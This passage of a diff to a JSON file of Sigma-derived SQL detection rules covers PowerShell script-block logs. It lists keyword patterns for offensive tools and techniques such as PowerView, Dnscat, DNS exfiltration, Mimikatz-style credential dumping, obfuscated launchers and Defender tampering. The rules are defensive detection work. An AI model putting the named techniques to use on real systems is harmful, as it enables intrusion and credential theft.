'%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-TroubleshootingPack%' ESCAPE '\\' AND ScriptBlockText LIKE '%C:\\\\Windows\\\\Diagnostics\\\\System\\\\PCW%' ESCAPE '\\' AND ScriptBlockText LIKE '%-AnswerFile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Unattended%' ESCAPE '\\')" ], - "filename": "posh_ps_accessing_win_api.yml" + "filename": "posh_ps_susp_follina_execution.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Powershell Store File In Alternate Data Stream", + "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_store_file_in_alternate_data_stream.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Suspicious New-PSDrive to Admin Share", + "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "status": "experimental", + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_susp_new_psdrive.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", - "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "status": "experimental", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ - "attack.exfiltration", - "attack.t1048", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Legitimate script that disables the command history" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "title": "Modify Group Policy Settings - ScriptBlockLogging", + "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "status": "experimental", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_modify_group_policy_settings.yml" }, { - "title": "Troubleshooting Pack Cmdlet Execution", - "id": "03409c93-a7c7-49ba-9a4c-a00badf2a153", + "title": "WMIC Unquoted Services Path Lookup - PowerShell", + "id": "09658312-bc27-4a3b-91c5-e49ab9046d1b", "status": "experimental", - "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-TroubleshootingPack%' ESCAPE '\\' AND ScriptBlockText LIKE '%C:\\\\Windows\\\\Diagnostics\\\\System\\\\PCW%' ESCAPE '\\' AND ScriptBlockText LIKE '%-AnswerFile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Unattended%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject %' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi %' ESCAPE '\\') AND ScriptBlockText LIKE '% Win32\\_Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%Name%' ESCAPE '\\' AND ScriptBlockText LIKE '%DisplayName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PathName%' ESCAPE '\\' AND ScriptBlockText LIKE '%StartMode%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_follina_execution.yml" + "filename": "posh_ps_wmi_unquoted_service_search.yml" }, { - "title": "Suspicious GetTypeFromCLSID ShellExecute", - "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "status": "experimental", - "description": "Detects suspicious Powershell code that execute COM Objects", + "title": "Get-ADUser Enumeration Using UserAccountControl Flags", + "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "status": "test", + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_gettypefromclsid.yml" + "filename": "posh_ps_as_rep_roasting.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - PS Script", - "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", - "falsepositives": [ - "Legitimate use of the library" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" - ], - "filename": "posh_ps_download_com_cradles.yml" - }, - { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -5917,427 +5775,462 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Manipulation of User Computer or Group Security Principals Across AD", - "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "title": "Suspicious IO.FileStream", + "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", "status": "test", - "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1136.002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" ], - "filename": "posh_ps_directoryservices_accountmanagement.yml" + "filename": "posh_ps_susp_iofilestream.yml" }, { - "title": "WMIC Unquoted Services Path Lookup - PowerShell", - "id": "09658312-bc27-4a3b-91c5-e49ab9046d1b", + "title": "PowerShell Write-EventLog Usage", + "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject %' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi %' ESCAPE '\\') AND ScriptBlockText LIKE '% Win32\\_Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%Name%' ESCAPE '\\' AND ScriptBlockText LIKE '%DisplayName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PathName%' ESCAPE '\\' AND ScriptBlockText LIKE '%StartMode%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" ], - "filename": "posh_ps_wmi_unquoted_service_search.yml" + "filename": "posh_ps_susp_write_eventlog.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", + "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + ], + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + }, + { + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "falsepositives": [ + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor 